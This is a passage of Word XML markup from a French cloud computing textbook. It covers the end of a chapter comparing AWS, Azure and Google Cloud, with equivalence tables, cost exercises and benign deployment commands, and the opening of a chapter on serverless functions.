        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Que sait déjà l'équipe ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>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Écosystème et services managés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Le service dont j'ai besoin existe-t-il ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Fort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Présence et latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une région proche des utilisateurs ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>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Coût total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Calcul, sortie réseau, support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Fort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le fournisseur répond-il au cadre légal ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Décisif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une méthode de comparaison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Comparer à l'identique : même région, même taille, même usage</w:t>
        <w:br/>
        <w:t># Coût mensuel estimé d'une petite application :</w:t>
        <w:br/>
        <w:t># - 2 instances de 2 vCPU / 4 Go</w:t>
        <w:br/>
        <w:t># - 100 Go de stockage objet</w:t>
        <w:br/>
        <w:t># - 200 Go de sortie réseau</w:t>
        <w:br/>
        <w:t># - une base managée de 2 vCPU / 8 Go</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utiliser les calculateurs officiels avec la MÊME hypothèse de charge</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LE COÛT DE SORTIE FAUSSE LES COMPARAISONS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une sortie réseau importante peut dépasser le coût de calcul. Un chiffrage qui ignore ce poste est faux, parfois d'un facteur deux.</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MIGRER D'UN FOURNISSEUR À L'AUTRE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Inventorier les services réellement utilisés.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Classer : remplaçable, adaptable, spécifique.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Migrer d'abord les charges sans état.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Conserver une période de double fonctionnement.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Mesurer la latence et le coût après migration.</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trois fournisseurs proposent les mêmes briques conceptuelles.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équivalence de nom ne garantit pas une équivalence de comportement.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Azure s'appuie sur un annuaire d'entreprise, Google sur des projets.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identités managées suppriment les secrets stockés.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plateformes de conteneurs sans serveur facturent à l'usage.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min-instances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite les démarrages à froid, à un coût fixe.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modèles réseau diffèrent par les noms, pas par les principes.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coût de sortie réseau doit entrer dans toute comparaison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les plateformes managées exécutent le code. Le chapitre suivant se concentre sur le modèle sans serveur.</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72.1 — Construire une table d'équivalences</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Une architecture AWS doit être transposée sur Azure et Google Cloud.</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Listez les briques utilisées.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Associez un équivalent.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Notez les différences de comportement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 72.2 — Déployer une même image sur deux plateformes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   CLOUD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image conteneur doit être servie par Azure Container Apps et Cloud Run.</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Déployez sur la première.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Déployez sur la seconde.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Comparez le temps de démarrage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 72.3 — Comparer deux options de coût</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FINOPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une API reçoit 200 000 requêtes par jour, avec des pics.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Estimez le coût en conteneur sans serveur.</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Estimez le coût en instance permanente.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Tranchez selon le profil de charge.</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72.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>| AWS | Azure | Google Cloud | différence |</w:t>
        <w:br/>
        <w:t>|-----|-------|--------------|------------|</w:t>
        <w:br/>
        <w:t>| ECS Fargate | Container Apps | Cloud Run | facturation à la requête chez GCP |</w:t>
        <w:br/>
        <w:t>| RDS | Azure SQL / Flexible Server | Cloud SQL | options de réplication |</w:t>
        <w:br/>
        <w:t>| S3 | Blob Storage | Cloud Storage | classes et cycles de vie |</w:t>
        <w:br/>
        <w:t>| CloudWatch | Azure Monitor | Cloud Monitoring | modèle d'alerte |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La colonne « différence » est la plus importante : elle évite de supposer une équivalence parfaite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les options de réplication et de bascule varient fortement d'un fournisseur à l'autre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 72.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Azure</w:t>
        <w:br/>
        <w:t>az containerapp create --name api --resource-group demo --environment demo-env \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --image registry.exemple.fr/equipe/app:1.4.2 --target-port 3000 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ingress external --min-replicas 0 --max-replicas 3</w:t>
        <w:br/>
        <w:br/>
        <w:t># Google Cloud</w:t>
        <w:br/>
        <w:t>gcloud run deploy api --image registry.exemple.fr/equipe/app:1.4.2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --region europe-west1 --allow-unauthenticated --min-instances 0 --max-instances 3</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mesurer après une période d'inactivité</w:t>
        <w:br/>
        <w:t>curl -w "%{time_total}\n" -o /dev/null -s https://api-xxxx.run.app/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-replicas 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, la première requête après inactivité subit un démarrage à froid ; la mesure le quantifie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le temps de démarrage dépend surtout de la taille de l'image et des initialisations applicatives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 72.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Conteneur sans serveur : facturation à l'usage, avantageuse si les pics sont courts et les nuits calmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Instance permanente : coût fixe, prévisible, préférable si la charge reste élevée en continu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le point d'équilibre se calcule sur une semaine réelle, pas sur une moyenne mensuelle.</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 service Azure fournit l'identité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IAM</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Entra ID</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Monitor</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VNet</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Quel est l'équivalent de S3 chez Google Cloud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Cloud SQL</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Cloud Storage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BigQuery</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Cloud Run</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-instances</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Limiter le coût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Éviter les démarrages à froid</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Réduire l'image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Bloquer les accès</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Pourquoi une équivalence de nom ne suffit-elle pas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Les noms changent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Les garanties et comportements diffèrent</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Les régions sont différentes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Les API sont identiques</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Entra ID est l'annuaire et le service d'identité d'Azure.</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Cloud Storage est le service de stockage objet.</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Une instance reste chaude, au prix d'une facturation permanente.</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Les détails de facturation, de réplication et de limites varient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>73. Serverless : fonctions et événements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exécuter du code sans serveur à gérer, en comprenant les contraintes du modèle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 72</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Reconnaître les charges adaptées au modèle sans serveur.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Écrire une fonction idempotente.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Gérer délais, mémoire et concurrence.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Éviter les pièges de facturation.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Concevoir une chaîne d'événements fiable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>73.1 Le modèle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une fonction est exécutée à la demande, facturée à l'invocation et à la durée. Le fournisseur gère le système, la montée en charge et la disponibilité. L'unité de déploiement n'est plus une machine mais une fonction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="85" name="Picture 85"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f83.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.83 — Le cycle d'une invocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.271 — Cinq contraintes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3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Contrainte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Ordre de grandeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Conséquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Durée maximale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quelques minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas de traitement très long</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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128 Mo à quelques Go</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Le CPU suit la mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille du paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
